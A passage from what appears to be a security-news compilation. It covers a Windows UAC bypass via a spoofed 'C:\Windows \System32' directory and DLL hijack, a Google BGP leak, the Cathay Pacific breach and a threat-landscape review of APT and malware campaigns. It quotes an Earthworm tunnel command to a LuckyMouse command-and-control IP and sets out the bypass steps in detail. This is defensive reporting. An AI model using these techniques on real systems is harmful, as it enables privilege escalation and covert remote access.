The researcher discovered that, in one of the checks it performs to ensure the executable can auto-elevate, Appinfo.dll (AIS) calls the RtlPrefixUnicodeString API and verifies that the target executable path begins with “C:\Windows\System32\.”
He was able to create a directory called “C:\Windows \” (it has a space after “Windows”) by using the CreateDirectory API and prepending a “\\?\” to the directory name (to bypass naming filter rules in Windows) and then created a “System32” directory in it.
Next, he copied a signed, auto elevating executable from the real “C:\Windows\System32”, and, by analyzing the manner in which Windows handles its execution, discovered that no UAC prompt is triggered.
When “C:\Windows \System32\winSAT.exe” is executed, Appinfo.dll passes it to the GetLongPathNameW API, which converts it back to “C:\Windows\System32\winSAT.exe,” removing the additional space after Windows. Next, the trusted directory checks are performed against this converted string.
“The beauty is that after the trusted directory check is done with this converted path string, it is then freed, and rest of checks (and final elevated execution request) are done with the original executable path name (with the trailing space). This allows all other checks to pass and results in appinfo.dll spawning my winSAT.exe copy as auto elevated (since it is both properly signed and whitelisted for auto elevation),” the researcher notes.
The researcher also notes that he was able to elevate attacker code by dropping a fake WINMM.dll (imported by winSAT.exe) in the spoofed “C:\Windows\System32\” directory, for a local dll hijack. The researcher also published proof-of-concept code for this UAC bypass technique.
51 States Pledge Support for Global Cybersecurity Rules
14.11.2018 securityweek BigBrothers
Fifty-one states, including all EU members, have pledged their support for a new international agreement to set standards on cyberweapons and the use of the internet, the French government said Monday.
The states have signed up to a so-called "Paris Call for Trust and Security in Cyberspace", an attempt to kickstart stalled global negotiations.
China, Russia and the United States did not sign the pledge, reflecting their resistance to setting standards for cyberweapons which are at the cutting edge of modern warfare.
"We need norms to avoid a war in cyberspace which would be catastrophic," French Foreign Minister Jean-Yves Le Drian said Monday.
Campaigners have called for a "Digital Geneva Convention", a reference to the Geneva conventions that set standards for the conduct of wars.
They want states to commit to not attacking infrastructure which is depended upon by civilians during wartime, for example.
A new international norm would also help define a state-backed cyberattack and when a state could be justified in retaliating.
Dozens of countries are thought to have developed offensive cyberweapons.
"We need to move these norms forward," Microsoft president Brad Smith said on Monday at the Paris Peace Forum, being held to mark the centenary of the end of World War I.
In a presentation at the forum, Smith portrayed cyberweapons as having the potential to spark another mass conflict.
- Global 'wake-up call' -
He said 2017 was a "wake-up call for the world" because of the WannaCry and NotPetya attacks.
WannaCry crippled many hospitals in Britain and affected 150 countries in 24 hours. It is thought to have been deployed from North Korea.
Many experts attribute NotPetya, which hit banking, power and business computing systems across Ukraine, to Russia.
But security officials note that those two attacks appear to be based on code stolen from the US National Security Agency, which leads the country's cyber-defences.
"In a world where everything is being connected, anything can be affected, which is why we need to come together," Smith added.
The text of the Paris call will be presented by French President Emmanuel Macron as he opens UNESCO's Internet Governance Forum in Paris on Monday.
It has also been signed by 93 civil society groups and 218 companies, Le Drian said.
"To respect people's rights and protect them online as they do in the physical world, states must work together, but also collaborate with private-sector partners, the world of research and civil society," according to the text.
Russia has been accused by Western countries of cyber-meddling over the last few years, while huge data breaches online have fuelled calls for new rules governing online behaviour.
Google Services Inaccessible Due to BGP Leak
14.11.2018 securityweek CyberSpy
Important Google services were inaccessible for some users on Monday due to a BGP leak that caused traffic to be directed through Russia, China and Nigeria. It’s unclear if the incident was caused by a configuration issue or if it was the result of a malicious attack.
The Border Gateway Protocol (BGP) controls the route of data across the Internet. BGP hijacking (route hijacking) and BGP leaks occur when IP address groups are intentionally or accidentally taken over by corrupting the routing tables that store the path to a network.
According to network monitoring company ThousandEyes, a BGP leak occurred on Monday when traffic to Google Search, G Suite and various Google Cloud services was directed through TransTelecom in Russia, Nigerian ISP MainOne, and China Telecom, where the traffic was getting dropped.
BGPmon, which monitors BGP routing information in real-time, reported that 212 unique Google prefixes were impacted. The incident mainly affected business-grade service providers rather than consumer ISPs, ThousandEyes noted.
“This incident at a minimum caused a massive denial of service to G Suite and Google Search. However, this also put valuable Google traffic in the hands of ISPs in countries with a long history of Internet surveillance,” ThousandEyes said in a blog post.
The company said it was unclear if this was a malicious attack or the result of a misconfiguration at the Nigerian ISP, but highlighted that the incident demonstrates no one is immune from BGP hijacks and leaks.
“Our analysis indicates that the origin of this leak was the BGP peering relationship between MainOne, the Nigerian provider, and China Telecom. MainOne has a peering relationship with Google via IXPN in Lagos and has direct routes to Google, which leaked into China Telecom,” ThousandEyes explained.
The firm reported seeing a suspicious announcement for a Google IP address at 12:45 PST, and Google claimed to have resolved the issue by 14:35 PST.
“Throughout the duration of this issue Google services were operating as expected and we believe the root cause of the issue was external to Google. We will conduct an internal investigation of this issue and make appropriate improvements to our systems to help prevent or minimize future recurrence,” Google told users on its Cloud Platform status page.
Researchers claimed recently that China Telecom has been constantly hijacking traffic over the past years, including from the United States, and directing it through China.
UPDATE. Nigeria's MainOne has confirmed that the BGP leak was caused by a misconfiguration.
MainOne confirms misconfiguration led to BGP leak
Cathay Pacific waited six months before disclosing the security breach
13.11.2018 securityaffairs Incindent
Cathay Pacific has admitted that it was under attack for three months and it took six months to disclose the data breach.
At the end of October, Cathay Pacific Airways Limited, the flag carrier of Hong Kong, announced that had suffered a major data breach affecting up to 9.4 million passengers.
Exposed data includes passport numbers, identity card numbers, email addresses, and credit card details were accessed, information exposed varies for each affected passenger.
The IT staff at Cathay discovered an unauthorized access of systems containing the passenger data of up 9.4 million people. Hackers also accessed 403 expired credit card numbers and twenty-seven credit card numbers with no CVV were accessed.
Cathay Pacific notified the incident to local police and legislators, it also set up a website for customers want to know if their personal data may have been exposed.
Now Cathay Pacific has admitted that it was under attack for three months and it took six months to disclose the data breach.
In the official statement released by the airline, the company declared it had detected “suspicious activity” earlier March 2018.
A written submission by Cathay Pacific Airways Limited to Hong Kong’s Legco reveals the company confirmed to be aware that in March it was under a full-scale attack on its servers. The attacks continued during the investigation, for three months the company was under siege.
“During this phase of the investigation, Cathay was subject to further attacks which were at their most intense in March, April and May but continued thereafter. These ongoing attacks meant that internal and external IT security resources had to remain focused on containment and prevention. “reads the written submission.
“Remediation activities began as part of this effort and continued throughout. Even as the number of successful attacks diminished, we remained concerned that new attacks could be mounted.”
Of course, experts have challenged the company to have kept the security breach hidden for six long months exposing its customers to further risks depending on the nature of the data exposed.
“During the second phase[confirming on which data had been accessed], the two big issues were: which passenger data had been accessed or exfiltrated and, since the affected databases were only partially accessed, whether the data in question could be reconstructed outside Cathay’s IT systems in a readable format useable to the attacker(s).” continues the submission.
“Conclusions on these issues proved difficult and time-consuming and were only reached in mid-August.”
The company explained that it spent a lot of time to reconstruct for every single user which data was accessed.
The author of an IoT botnet is distributing a backdoor script for ZTE routers that also includes his own backdoor to hack script kiddies
A weaponized IoT exploit script is being used by script kiddies, making use of a vendor backdoor account to hack the ZTE routers. Ironically, this is not the only backdoor in the script. Scarface, the propagator of this code has also deployed his custom backdoor to hack any script kiddie who will be using the script.
With top names in IOT (Paras/Nexus/Wicked) being inactive, Scarface/Faraday is presently a go to name for script kiddies for buying IoT botnet code as well as weaponized exploits. While Scarface mostly has a good credibility, we observed that he has released a weaponized ZTE ZXV10 H108L Router known vulnerability with a backdoor which compromises the system of the script kiddie when they run it.
The vulnerability is a known one and involves the usage of a backdoor account in ZTE Router for login followed a command injection in manager_dev_ping_t.gch. The code by Scarface targets devices on a different port, 8083 though( justifying why our NewSky honeypots are seeing a surge of this vulnerability usage on port 8083 instead of the standard 80/8080 ports). It is, however, not the only difference.
In the leaked code snippet, we see login_payload for the backdoor usage and command_payload for the command injection. However, there is one more variable, auth_payload, which contains Scarface’s backdoor, encoded in base64.
This backdoor code is executed sneakily via exec, separately from the three steps of the actual vulnerability (using the vendor backdoor, command injection and log out) which are shown in the image below:
The backdoor code after decoding connects to another website which has code to connect to a paste(.)ee URL and execute further code:
We can see that a set of backdoor user credentials are added, followed by trace deletion by clearing logs and history. Another URL is connected to via wget which doesn’t do much as it hosts a meme video (probably an indicator that by this time Scarface has owned your device).
Backdooring rival IoT botnet operator can have several purposes. For example, the bigger fish Scarface after controlling the script kiddies systems can also control the smaller botnets they have constructed, or he can simply use access to rival IoT botnet operator systems for personal rivalry /grudges.
Expert found a way to bypass Windows UAC by mocking trusted Directory
13.11.2018 securityaffairs Vulnerebility
David Wells, a security expert from Tenable, devised a method to bypass Windows’ User Account Control (UAC) by spoofing the execution path of a file in a trusted directory.
A security researcher from Tenable has discovered that is possible to bypass Windows’ User Account Control (UAC) by spoofing the execution path of a file in a trusted directory.
User Account Control (UAC) is a technology and security mechanism that aims to limit application software to standard user privileges until an administrator authorizes an increase or elevation.
Some programs can auto-elevate privileges bypassing UAC, to prevent abuses Windows implements a series of additional security checks to allow that only a specific group of trusted executables can auto-elevate.
Executables that can auto-elevate have specific configuration, need to be properly signed, and to run from a Trusted Directory (i.e. “C:\Windows\System32”).
David Wells researcher discovered the Appinfo.dll (AIS) will use RtlPrefixUnicodeString API to see if the target executable path begins with “C:\Windows\System32\” for one of the trusted directory checks.
Then the researcher created a directory called “C:\Windows \” (with a space after the word “Windows”) by using the CreateDirectory API and prepending a “\\?\” to the directory name and then created a “System32” directory in it.
“So for bypassing this check, I construct a directory called “C:\Windows \” (notice trailing space after “Windows”). This won’t pass the RtlPrefixUnicodeString check of course, and I’ll also mention that this is somewhat invalid (or in the very least “unfriendly”) directory name, as Windows does not allow trailing spaces when you create a directory (try it).” wrote the expert.
“Using the CreateDirectory API however, and prepending a “\\?\” to the directory name I want to create, we can bypass some of these naming filter rules and send the directory creation request directly to file system.”
Then the expert copied a signed, auto elevating executable from “C:\Windows\System32”, and discovered that upon its execution no UAC prompt is triggered.
“When this awkward path is sent to AIS for an elevation request, the path is passed to GetLongPathNameW, which converts it back to “C:\Windows\System32\winSAT.exe” (space removed). Perfect! This is now the string that trusted directory checks are performed against (using RtlPrefixUnicodeString) for the rest of the routine.” explained the expert.
“The beauty is that after the trusted directory check is done with this converted path string, it is then freed, and rest of checks (and final elevated execution request) are done with the original executable path name (with the trailing space). This allows all other checks to pass and results in appinfo.dll spawning my winSAT.exe copy as auto elevated (since it is both properly signed and whitelisted for auto elevation).”
The expert elevated a malicious code simply dropping a fake WINMM.dll (imported by winSAT.exe) in the current directory “C:\Windows \System32\” for a local dll hijack.
Wells published a proof-of-concept code on GitHub.
Google Services down due to BGP leak, traffic hijacked through Russia, China, and Nigeria
13.11.2018 securityaffairs BigBrothers
Google services were partially inaccessible on Monday due to a BGP leak that caused traffic redirection through Russia, China, and Nigeria.
A BGP leak caused unavailability of Google service on Monday, the traffic was redirected through Russia, China, and Nigeria.
At the time it is not clear if the incident was the result of an error or a cyber attack on the BGP protocol.
It’s unclear if the incident was caused by a configuration issue or if it was the result of a malicious attack.
Route hijacking, also known as BGP hijacking, occurs when the routing tables for groups of IP addresses are intentionally or accidentally corrupted.
Recently security researchers Chris C. Demchak and Yuval Shavitt revealed that over the past years, China Telecom has been misdirecting Internet traffic through China.
China Telecom is currently present in North American networks with 10 points-of-presence (PoPs) (eight in the United States and two in Canada), spanning major exchange points.
The two researchers pointed out that the telco company leverages the PoPs to hijack traffic through China, it has happened several times over the past years,
“Within the BGP forwarding tables, administrators of each AS announce to their AS neighbors the IP address blocks that their AS owns, whether to be used as a destination or a convenient transit node.” states the paper.
“Errors can occur given the complexity of configuring BGP, and these possible errors offer covert actors a number of hijack opportunities. If network AS1 mistakenly announces through its BGP that it owns an IP block that actually is owned by network AS2, traffic from a portion of the Internet destined for AS2 will actually be routed to – and through – AS1. If the erroneous announcement was maliciously arranged, then a BGP hijack has occurred.”
The latest BGP leaks were first reported by the network monitoring firm ThousandEyes, the traffic to Google services, including Search, G Suite, and various Google Cloud services, was directed through TransTelecom in Russia, Nigerian ISP MainOne, and China Telecom.
BREAKING: Potential hijack underway. ThousandEyes detected intermittent availability issues to Google services from some locations. Traffic to certain Google destinations appears to be routed through an ISP in Russia & black-holed at a China Telecom gateway router.
10:57 PM - Nov 12, 2018
552 people are talking about this
Twitter Ads info and privacy
“On November 12th, 2018, between 1:00 PM and 2:23 PM PST, ThousandEyes noticed issues connecting to G Suite, a critical application for our organization. Reviewing ThousandEyes Endpoint Agent stats, we noticed this was impacting all users at the ThousandEyes office.” reads the analysis published Thousandeyes.
“The outage not only affected G Suite, but also Google Search as well as Google Analytics. What caught our attention was that traffic to Google was getting dropped at China Telecom. Why would traffic from a San Francisco office traversing to Google go all the way to China? We also noticed a Russian ISP in the traffic path, which definitely sparked some concerns.”
According to the BGP routing monitoring firm BGPmon, 212 unique Google prefixes were impacted.
ThousandEyes speculate the origin of this leak was the BGP peering relationship between the Nigerian provider MainOne and China Telecom, anyway it is unclear if the BGP leaks were the result of an intentional attack or a misconfiguration at MainOne
In addition to @Google downstream networks from The Nigerian ISP AS37282 Mainone, were affected. Including for example this @Cloudflare prefixhttps://stat.ripe.net/18.104.22.168%2F22#tabId=routing&routing_bgplay.ignoreReannouncements=false&routing_bgplay.resource=22.214.171.124/22&routing_bgplay.starttime=1542053570&routing_bgplay.endtime=1542062570&routing_bgplay.rrcs=0,1,2,5,6,7,10,11,13,14,15,16,18,20&routing_bgplay.instant=null&routing_bgplay.type=bgp …
1:48 AM - Nov 13, 2018
25 people are talking about this
This is a good visual replay of the incident, in this case for the prefix 126.96.36.199/19. Clearly visiable is the leak via AS 4809 and 37282 https://stat.ripe.net/188.8.131.52%2F19#routing_upstream-visibility.resource=184.108.40.206/19&tabId=routing&routing_bgplay.ignoreReannouncements=false&routing_bgplay.resource=220.127.116.11/19&routing_bgplay.starttime=1542053570&routing_bgplay.endtime=1542062570&routing_bgplay.rrcs=0,1,2,5,6,7,10,11,13,14,15,16,18,20&routing_bgplay.instant=null&routing_bgplay.type=bgp …
12:28 AM - Nov 13, 2018
29 people are talking about this
Twitter Ads info and privacy
.“This incident at a minimum caused a massive denial of service to G Suite and Google Search. However, this also put valuable Google traffic in the hands of ISPs in countries with a long history of Internet surveillance,” continues the analysis published by ThousandEyes.
“Overall ThousandEyes detected over 180 prefixes affected by this route leak, which covers a vast scope of Google services. Our analysis indicates that the origin of this leak was the BGP peering relationship between MainOne, the Nigerian provider, and China Telecom. “
“Our analysis indicates that the origin of this leak was the BGP peering relationship between MainOne, the Nigerian provider, and China Telecom. MainOne has a peering relationship with Google via IXPN in Lagos and has direct routes to Google, which leaked into China Telecom,”.
This affected 212 unique Google Prefixes. All Google prefixes that were affected can be found here: https://portal.bgpmon.net/data/google-leak-nov2018.txt …
11:55 PM - Nov 12, 2018
Twitter Ads info and privacy
20 people are talking about this
Twitter Ads info and privacy
Google confirmed that the root cause of the incident was external to the company systems and launched an internal investigation on it.
“Throughout the duration of this issue Google services were operating as expected and we believe the root cause of the issue was external to Google. We will conduct an internal investigation of this issue and make appropriate improvements to our systems to help prevent or minimize future recurrence,” reads the Google Cloud Platform status page.
Researchers Chris C. Demchak and Yuval Shavitt described many other BGP hijacking attacks involving China Telecom. They are pushing to adopt solutions to protect BGP, Cloudflare for example, sustains that Resource Public Key Infrastructure (RPKI) could secure BGP routing.
Targeted attacks and malware campaigns
Lazarus targets cryptocurrency exchange
Lazarus is a well-established threat actor that has conducted cyber-espionage and cybersabotage campaigns since at least 2009. In recent years, the group has launched campaigns against financial organizations around the globe. In August we reported that the group had successfully compromised several banks and infiltrated a number of global cryptocurrency exchanges and fintech companies. While assisting with an incident response operation, we learned that the victim had been infected with the help of a Trojanized cryptocurrency trading application that had been recommended to the company over email.
An unsuspecting employee had downloaded a third-party application from a legitimate looking website, infecting their computer with malware known as Fallchill, an old tool that Lazarus has recently started using again.
It seems as though Lazarus has found an elaborate way to create a legitimate looking site and inject a malicious payload into a ‘legitimate looking’ software update mechanism – in this case, creating a fake supply chain rather than compromising a real one. At any rate, the success of the Lazarus group in compromising supply chains suggests that it will continue to exploit this method of attack.
The attackers went the extra mile and developed malware for non-Windows platforms – they included a Mac OS version and the website suggests that a Linux version is coming soon. This is probably the first time that we’ve seen this APT group using malware for Mac OS. It would seem that in the chase after advanced users, software developers from supply chains and some high-profile targets, threat actors are forced to develop Mac OS malware tools. The fact that the Lazarus group has expanded its list of targeted operating systems should be a wake-up call for users of non-Windows platforms.
This campaign should be a lesson to all of us and a warning to businesses relying on third-party software. Do not automatically trust the code running on your systems. Neither a good-looking website, nor a solid company profile, nor digital certificates guarantee the absence of backdoors. Trust has to be earned and proven.
You can read our Operation AppleJeus report here.
Since March 2018, we have found several infections where a previously unknown Trojan was injected into the ‘lsass.exe’ system process memory. These implants were injected by the digitally signed 32- and 64-bit network filtering driver NDISProxy. Interestingly, this driver is signed with a digital certificate that belongs to the Chinese company LeagSoft, a developer of information security software based in Shenzhen, Guangdong. We informed the company about the issue via CN-CERT.
The campaign targeted Central Asian government organizations and we believe the attack was linked to a high-level meeting in the region. We believe that the Chinese-speaking threat actor LuckyMouse is responsible for this campaign. The choice of the Earthworm tunneler used in the attack is typical for Chinese-speaking actors. Also, one of the commands used by the attackers (“-s rssocks -d 103.75.190[.]28 -e 443”) creates a tunnel to a previously known LuckyMouse command-and-control (C2) server. The choice of victims in this campaign also aligns with the previous interests shown by this threat actor.
The malware consists of three modules: a custom C++ installer, the NDISProxy network filtering driver and a C++ Trojan:
We have not seen any indications of spear phishing or watering hole activity. We think the attackers spread their infectors through networks that were already compromised.
The Trojan is a full-featured RAT capable of executing common tasks such as command execution, and downloading and uploading files. The attackers use it to gather a target’s data, make lateral movements and create SOCKS tunnels to their C2 using the Earthworm tunneler. This tool is publicly available and is popular among Chinese-speaking actors. Given that the Trojan is an HTTPS server itself, we believe that the SOCKS tunnel is used for targets without an external IP, so that the C2 is able to send commands.
You can read our LuckyMouse report here.
Financial fraud on an industrial scale
Usually, attacks on industrial enterprises are associated with cyber-espionage or sabotage. However, we recently discovered a phishing campaign designed to steal money from such organizations – primarily manufacturing companies.
The attackers use standard phishing techniques to lure their victims into clicking on infected attachments, using emails disguised as commercial offers and other financial documents. The criminals use legitimate remote administration applications – either TeamViewer or RMS (Remote Manipulator System). These programs were employed to gain access to the device, then scan for information on current purchases, and financial and accounting software. The attackers then use different ploys to steal company money – for example, by replacing the banking details in transactions. At the time we published our report, on August 1, we had seen infections on around 800 computers, spread across at least 400 organizations in a wide array of industries – including manufacturing, oil and gas, metallurgy, engineering, energy, construction, mining and logistics. The campaign has been ongoing since October 2017.
Our research highlights that even when threat actors use simple techniques and known malware they can successfully attack industrial companies by using social engineering tricks and hiding their code in target systems – using legitimate remote administration software to evade detection by antivirus solutions. Remote administration capabilities give criminals full control of compromised systems, so possible attack scenarios are not limited to the theft of money. In the process of attacking their targets, the attackers steal sensitive data belonging to target organizations, their partners and customers, carry out surreptitious video surveillance of company employees and record audio and video using devices connected to infected machines. While the series of attacks targets primarily Russian organizations, the same tactics and tools could be successfully used in attacks against industrial companies anywhere.
You can find out more about how attackers use remote administration tools to compromise their targets here, and an overview of attacks on ICS systems in the first half of 2018 here.
Exploiting the digital gold rush
For some time now, we’ve been tracking a dramatic decline in ransomware and a massive growth in cryptocurrency mining. The number of people who encountered miners grew from 1,899,236 in 2016-17 to 2,735,611 in 2017-18. This is clearly because it’s a lucrative activity for cybercriminals – we estimate that mining botnets generated more than $7,000,000 in the second half of 2017. Not only are we seeing purpose-built cryptocurrency miners, we’re also seeing existing malware adding this functionality to their arsenal.
The ransomware Trojan Rakhni is a case in point. The malware loader chooses which component to install depending on the device. The malware, which we have seen in Russia, Kazakhstan, Ukraine, Germany and India, is distributed through spam mailings with malicious attachments. One of the samples we analysed masquerades as a financial document. When loaded, this appears to be a document viewer. The malware displays an error message explaining why nothing has opened. It then disables Windows Defender and installs forged digital certificates.
The malware checks to see if there are Bitcoin-related folders on the computer. If there are, it encrypts files and demands a ransom. If not, it installs a cryptocurrency miner. Finally, the malware tries to spread to other computers within the network. You can read our analysis of Rakhni here.
Cybercriminals don’t just use malware to cash in on the growing interest in cryptocurrencies; they also use established social engineering techniques to trick people out of their digital money. This includes sending links to phishing scams that mimic the authorization pages of popular crypto exchanges, to trick their victims into giving the scammers access to their crypto exchange account – and their money. In the first half of 2018, we saw 100,000 of these attempts to redirect people to such fake pages.
The same approach is used to gain access to online wallets, where the ‘hook’ is a warning that the victim will lose money if they don’t go through a formal identification process – the attackers, of course, harvest the details entered by the victim. This method works just as well where the victim is using an offline wallet stored on their computer.
Scammers also try to use the speculation around cryptocurrencies to trick people who don’t have a wallet: they lure them to fake crypto wallet sites, promising registration bonuses, including cryptocurrency. In some cases, they harvest personal data and redirect the victim to a legitimate site. In others, they open a real wallet for the victim, which is compromised from the outset. Online wallets and exchanges aren’t the only focus of the scammers; we have also seen spoof versions of services designed to facilitate transactions with digital coins stored on the victim’s computer.
Earlier this year, we provided some advice on choosing a crypto wallet.
We recently discovered a cryptocurrency miner, named PowerGhost, focused mainly on workstations and servers inside corporate networks – thereby hoping to commandeer the power of multiple processors in one fell swoop. It’s not uncommon to see cybercriminals infect clean software with a malicious miner to promote the spread of their malware. However, the creators of PowerGhost went further, using fileless methods to establish it in a compromised network. PowerGhost tries to log in to network user accounts using WMI (Windows Management Instrumentation), obtaining logins and passwords using the Mimikatz data extraction tool. The malware can also be distributed using the EternalBlue exploit (used last year in the WannaCry and ExPetr outbreaks). Once a device has been infected, PowerGhost tries to enhance its privileges using operating system vulnerabilities. Most of the attacks we’ve seen so far have been in India, Turkey, Brazil and Colombia.
The number of ransomware attacks has been declining in the last year or so. Nevertheless, this type of malware remains a problem and we continue to see the development of new ransomware families. Early in August, our anti-ransomware module started detecting the ‘KeyPass‘ Trojan. In just two days, we found this malware in more than 20 countries – Brazil and Vietnam were hardest hit, but we also found victims in Europe, Africa and the Far East.
We believe that the criminals behind KeyPass use fake installers that download the malware.
KeyPass encrypts all files, regardless of extension, on local drives and network shares that are accessible from the infected computer. It ignores some files located in directories that are hardcoded in the malware. Encrypted files are given the additional extension ‘KEYPASS’, and ransom notes called ‘!!!KEYPASS_DECRYPTION_INFO!!!.txt’ are saved in each directory containing encrypted files.
The creators of this Trojan implemented a very simplistic scheme. The malware uses the symmetric algorithm AES-256 in CFB mode with zero IV and the same 32-byte key for all files. The Trojan encrypts a maximum of 0x500000 bytes (~5 MB) of data at the start of each file.
Shortly after launch, the malware connects to its C2 server and obtains the encryption key and infection ID for the current victim. The data is transferred over plain HTTP in the JSON format. If the C2 is unavailable – for example, the infected computer is not connected to the internet, or the server is down – the malware uses a hardcoded key and ID. As a result, in the case of offline encryption, decryption of the victim’s files will be trivial.
Probably the most interesting feature of the KeyPass Trojan is its ability to take ‘manual control’. The Trojan contains a form that is hidden by default, but which can be shown after pressing a special button on the keyboard. This form allows the criminals to customize the encryption process by changing such parameters as the encryption key, the name of the ransom note, the text of the ransom, the victim ID, the extension of encrypted files and the list of directories to be excluded from encryption. This capability suggests that the criminals behind the Trojan might intend to use it in manual attacks.
Sextortion with a twist
Scams come in many forms, but the people behind them are always on the lookout for ways to lend credibility to the scam and maximise their opportunity to make money. One recent ‘sextortion’ scam uses stolen passwords for this purpose. The victim receives an email message claiming that their computer has been compromised and that the attacker has recorded a video of them watching pornographic material. The attackers threaten to send a copy of the video to the victim’s contacts unless they pay a ransom within 24 hours. The ransom demand is $1,400, payable in bitcoins.
The scammer includes a legitimate password in the message, in a bid to convince the victim that they have indeed been compromised. It seems that the passwords used are real, although in some cases at least they are very old. The passwords were probably obtained in an underground market and came from an earlier data breach.
The hunt for corporate passwords
It’s not just individuals who are targeted by phishing attacks – starting from early July, we saw malicious spam activity targeting corporate mailboxes. The messages contained an attachment with an .ISO extension that we detect as Loki Bot. The objective of the malware is to steal passwords from browsers, messaging applications, mail and FTP clients, and cryptocurrency wallets, and then to forward the data to the criminals behind the attacks.
The messages are diverse in nature. They include fake notifications from well-known companies:
Or fake orders or offers:
The scammers pass off malicious files as financial documents: invoices, transfers, payments, etc. This is a fairly popular malicious spamming technique, with the message body usually consisting of no more than a few lines and the subject mentioning the fake attachment.
Each year we see an increase in spam attacks on the corporate sector aimed at obtaining confidential corporate information: intellectual property, authentication data, databases, bank accounts, etc. That’s why it’s essential for corporate security strategy to include both technical protection and staff education – to stop them becoming the entry-point for a cyberattack.
Botnets: the big picture
Spam mailshots with links to malware, and bots downloading other malware, are just two botnet deployment scenarios. The choice of payload is limited only by the imagination of the botnet operator or their customers. It might be ransomware, a banker, a miner, a backdoor, etc. Every day we intercept numerous file download commands sent to bots of various types and families. We recently presented the results of our analysis of botnet activity for H2 2017 and H1 2018.
Here are the main trends that we identified by analyzing the files downloaded by bots:
The share of miners in bot-distributed files is increasing, as cybercriminals have begun to view botnets as a tool for cryptocurrency mining.
The number of downloaded droppers is also on the rise, reflecting the fact that attacks are multi-stage and growing in complexity.
The share of banking Trojans among bot-downloaded files in 2018 decreased, but it’s too soon to speak of an overall reduction in number, since they are often delivered by droppers.
Increasingly, botnets are leased according to the needs of the customer, so in many cases it is difficult to pinpoint the ‘specialization’ of the botnet.
Using USB devices to spread malware
USB devices, which have been around for almost 20 years, offer an easy and convenient way to store and transfer digital files between computers that are not directly connected to each other or to the internet. This capability has been exploited by cyberthreat actors – most notably in the case of the state-sponsored threat Stuxnet, which used USB devices to inject malware into the network of an Iranian nuclear facility.
These days the use of USB devices as a business tool is declining, and there is greater awareness of the security risks associated with them. Nevertheless, millions of USB devices are still produced for use at home, in businesses and in marketing promotion campaigns such as trade show giveaways. So they remain a target for attackers.
Kaspersky Lab data for 2017 showed that one in four people worldwide were affected by a local cyber-incident, i.e. one not related to the internet. These attacks are detected directly on a victim’s computer and include infections caused by removable media such as USB devices.
We recently published a review of the current cyberthreat landscape for removable media, particularly USBs, and offered advice and recommendations for protecting these little devices and the data they carry.
Here is a summary of our findings.
USB devices and other removable media have been used to spread cryptocurrency mining software since at least 2015. Some victims were found to have been carrying the infection for years.
The rate of detection for the most popular bitcoin miner, Trojan.Win64.Miner.all, is growing by around one-sixth year-on-year.
Every tenth person infected via removable media in 2018 was targeted with this cryptocurrency miner: around 9.22% – up from 6.7% in 2017 and 4.2% in 2016.
Other malware spread through removable media includes the Windows LNK family of Trojans, which has been among the top three USB threats detected since at least 2016.
The Stuxnet exploit, CVE-2010-2568, remains one of the top 10 malicious exploits spread via removable media.
Emerging markets are the most vulnerable to malicious infection spread by removable media – with Asia, Africa and South America among the most affected – but isolated hits were also detected in countries in Europe and North America.
Dark Tequila, a complex banking malware reported in August 2018 has been claiming consumer and corporate victims in Mexico since at least 2013, with the infection spreading mainly through USB devices.
New trends in the world of IoT threats
The use of smart devices is increasing. Some forecasts suggest that by 2020 the number of smart devices will exceed the world’s population several times over. Yet manufacturers still don’t prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions, and the updating process itself can be complex for the average consumer. This makes IoT devices a prime target for cybercriminals. Easier to infect than PCs, they often play an important role in the home infrastructure: some manage internet traffic, others shoot video footage and still others control domestic devices – for example, air conditioning.
Malware for smart devices is increasing not only in quantity but also quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to launch DDoS attacks, to steal personal data and to mine cryptocurrency.
You can read our report on IoT threats here, including tips on how to reduce the risk of smart devices being infected.
A look at the Asacub mobile banking Trojan
The first version of Asacub, which we saw in June 2015, was a basic phishing app: it was able to send a list of the victim’s apps, browser history and contact list to a remote C2 server, send SMS messages to a specific phone number and turn off the screen on demand. This mobile Trojan has evolved since then, off the back of a large-scale distribution campaign by its creators in spring and summer 2017), helping it to claim top spot in last year’s ranking of mobile banking Trojans – out-performing other families such as Svpeng and Faketoken. The Trojan has claimed victims in a number of countries, but the latest version steals money from owners of Android devices connected to the mobile banking service of one of Russia’s largest banks.
The malware is spread via an SMS messages containing a link and an offer to view a photo or MMS message. The link directs the victim to a web page containing a similar sentence and a button for downloading the Trojan APK file to the device.
Asacub masquerades as an MMS app or a client of a popular free ads service.
Once installed, the Trojan starts to communicate with the C2 server. Data is transferred in JSON format and includes information about the victim’s device – smartphone model, operating system, mobile operator and Trojan version.
Asacub is able to withdraw funds from a bank card linked to the phone by sending an SMS for the transfer of funds to another account using the number of the card or mobile phone. Moreover, the Trojan intercepts SMS messages from the bank that contain one-time passwords and information about the balance of the linked bank card. Some versions of the Trojan can autonomously retrieve confirmation codes from such SMS messages and send them to the required number. What’s more, the victim can’t subsequently check the balance via mobile banking or change any settings, because after receiving a command with the code 40, the Trojan prevents the banking app from running on the phone.
You can read more here.
BusyGasper – the unfriendly spy
Early in 2018, our mobile intruder detection technology was triggered by a suspicious Android sample that turned out to belong to a new spyware family that we named BusyGasper. The malware isn’t sophisticated, but it does demonstrate some unusual features for this type of threat. BusyGasper is a unique spy implant with stand-out features such as device sensor listeners, including motion detectors that have been implemented with a degree of originality. It has an incredibly wide-ranging protocol – about 100 commands – and an ability to bypass the Doze battery saver. Like other modern Android spyware, it is capable of exfiltrating data from messaging applications – WhatsApp, Viber and Facebook. It also includes some keylogging tools – the malware processes every user tap, gathering its co-ordinates and calculating characters by matching given values with hardcoded ones.
The malware has a multi-component structure and can download a payload or updates from its C2 server, which happens to be an FTP server belonging to the free Russian web hosting service Ucoz. It is noteworthy that BusyGasper supports the IRC protocol, which is rarely seen among Android malware. In addition, it can log in to the attacker’s email inbox, parse emails in a special folder for commands and save any payloads to a device from email attachments.
There is a hidden menu for controlling the different implants that seems to have been created for manual operator control. To activate the menu, the operator needs to call the hardcoded number 9909 from an infected device.
The operator can use this interface to type any command. It also shows a current malware log.
This particular operation has been active since May. We have found no evidence of spear phishing or other common infection method. Some clues, such as the existence of a hidden menu mentioned above, suggest a manual installation method – the attackers gaining physical access to a victim’s device in order to install the malware. This would explain the number of victims – less than 10 in total, all located in the Russia. There are no similarities to commercial spyware products or to other known spyware variants, which suggests that BusyGasper is self-developed and used by a single threat actor. At the same time, the lack of encryption, use of a public FTP server and the low OPSEC level could indicate that less skilled attackers are behind the malware.
Thinking outside the [sand]box
